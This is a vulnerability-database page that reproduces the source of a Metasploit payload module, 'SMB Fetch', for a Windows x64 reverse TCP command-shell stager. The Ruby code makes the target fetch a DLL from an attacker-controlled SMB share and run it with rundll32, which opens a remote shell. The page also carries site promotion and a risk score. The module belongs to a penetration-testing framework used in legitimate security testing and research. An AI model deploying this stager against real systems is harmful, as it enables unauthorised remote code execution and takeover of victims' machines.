Lucene search

SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)

🗓️ 29 Jan 2024 21:28:44Reported by Spencer McIntyre, sf <[email protected]>, hdm <[email protected]>, skape <[email protected]>, mihi, max3raza, RageLtManType

metasploit🔗 www.rapid7.com👁 78 Views

SMB Fetch for x64 Command Shell execution with Reverse TCP Stager (RC4 Encryption

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::SMB

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SMB Fetch',
        'Description' => 'Fetch and execute an x64 payload from an SMB server.',
        'Author' => 'Spencer McIntyre',
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X64,
        'AdaptedPlatform' => 'win'
      )
    )
    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR')
  end

  def srvport
    445 # UNC paths for SMB services *must* be 445
  end

  def generate_fetch_commands
    "rundll32 #{unc},0"
  end

  # generate a DLL instead of an EXE
  alias generate_payload_exe generate_payload_dll
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

29 Jan 2024 21:44Current

7.6High risk

Vulners AI Score7.6